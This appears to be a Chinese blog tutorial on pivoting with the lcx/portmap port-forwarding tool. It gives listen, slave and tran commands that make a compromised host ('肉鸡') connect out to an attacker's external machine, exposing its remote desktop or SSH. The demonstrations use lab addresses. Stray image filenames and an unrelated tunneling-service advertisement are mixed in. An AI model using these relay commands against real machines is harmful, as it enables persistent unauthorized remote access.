| 2018-12-6
在实际情况中,web应用服务通常会被运行在内网机器上,然后通过端口映射到外网,供外网用户进行访问。如果我们已经攻破网站,拿到内网机器权限,通常会安装反弹木马到自己的外网主机,然后在外网主机进行操作。但是,这样操作就会变得很繁琐,需要从自己的内网机登陆到外网主机,然后控制外网主机来对肉鸡进行操作。而lcx端口转发工具可以帮助我们减轻一些负担。
lcx是一款端口转发工具,可以将肉鸡的某个端口转发到我们自己的外网主机上的某个端口,然后我们只需在内网机访问外网主机的端口达到访问肉鸡相应端口的效果。比如说,肉鸡A开了3389端口,我们将它转发到自己的外网机B的55端口,那么我们在内网的机器C通过访问B的55端口,就可以连接到A的远程桌面。
假设外网机B在111端口监听来自肉鸡A的消息,在55端口监听来自内网机C的消息。过程大致如下:肉鸡A主动连接外网机B的111端口,外网机B将从111端口接收的数据转到55端口,同样,也将从55端口接收到的数据转到111端口,111端口接收到的数据再传给肉鸡A的3389端口,肉鸡A的3389端口的数据也可以转给外网机B的111端口。那么,我们在内网机C通过访问外网机B的55端口就可以与肉鸡A的3389端口建立起通信,访问到A的远程桌面。
lcx有windows版和linux版两个版本,这两个版本的lcx都具有三个功能:监听;转发;端口转向。在使用lcx时必须保证两个前提,肉鸡A和内网机C都能够访问到外网机B;listen监听的端口之前不能被其它程序占用。Linux版的使用与Windows版大同小异,都是先在外网机B进行监听,之后在肉鸡A进行转发,然后在内网机C进行访问。所不同的是,在转发过程中,Windows版的转发命令”-slave”命令后紧接的是外网机B的ip和端口号,然后再跟肉鸡A的ip和端口号,形如:lcx -slave IP(B) Port(B) IP(A) port(A);而linux版的对应的转发命令形如: ./portmap -m 3 – h1 IP(A) -p1 port(A) -h2 IP(B) -p2 port(B)。portmap为自己编译源文件生成的文件名。linux版的method 2对应的windows版的listen功能,即监听功能,method 1对应的是tran功能,即端口转向功能。我们常用到的是listen功能和转发功能slave。
全windows下的操作网上有很多文章教程,这里不再重复。主要演示以下三种: tran功能;linux监听,windows转发;windows监听,linux转发。windows主机地址192.168.91.129,linux主机地址192.168.91.134。
1、 tran功能
tran功能是端口转向功能,通过访问该端口可以直接与该主机或另一台主机的某一个端口进行通信。比如,肉鸡A开启了3389端口,使用tran命令转向到肉鸡A的55端口,那么,我们访问肉鸡A的55端口就可以连接到肉鸡A的远程桌面。又比如,外网机B可以直接访问到肉鸡A的3389端口,我们使用tran将外网机B的3333端口转向到肉鸡A的3389端口,那么,我们通过访问外网机B的3333端口就可以连接到肉鸡A的远程桌面。
(1) 本机端口转向
命令:lcx -tran 55 127.0.0.1 3389
tran%e6%9c%ac%e6%9c%ba
%e6%9c%ac%e6%9c%ba%e7%ab%af%e5%8f%a3%e8%bd%ac%e5%90%91%e6%95%88%e6%9e%9c%e5%9b%be
(2) 转向其他主机端口
命令:lcx -m 1 -p1 3333 -h2 192.168.91.129 -p2 3389
%e5%85%b6%e4%bb%96%e4%b8%bb%e6%9c%ba%e7%ab%af%e5%8f%a3%e8%bd%ac%e5%90%91
%e5%85%b6%e4%bb%96%e4%b8%bb%e6%9c%ba%e7%ab%af%e5%8f%a3%e8%bd%ac%e5%90%91%e6%95%88%e6%9e%9c
2、linux监听,windows转发
(1) linux监听:./portmap -m 2 -p1 2222 -p2 55
(2) windows转发:lcx -slave 192.168.91.134 2222 192.168.91.129 3389
(3) 测试结果
linux%e4%b8%ad%e4%b8%93
3、windows监听,linux转发
(1) windows监听:lcx -listen 111 55
windows%e7%9b%91%e5%90%ac
(2) linux转发:./portmap -m 3 -h1 192.168.91.134 -p1 22 -h2 192.168.91.129 -p2 111
linux%e8%bd%ac%e5%8f%91
PS:我在测试的时候发现运行此命令会报错,但是结果确实会转发正确的,还请代码大神看看能不能改改源码解决解决啦~~
(3) 测试结果
win%e8%bd%ac
花生壳动态域名解析于2013年11月11日正式发布花生壳(内网穿透)服务。无需公网IP,无需路由器端口映射,从此对nat说NO!颠覆式的动态域名技术创新,全新的交互界面及功能体验,满足你多元化的需求,带给你焕然一新的使用感受。在安装完成花生壳(内网穿透)版本的客户端以及注册花生壳账号之后就可以使用花生壳进行内网穿透了。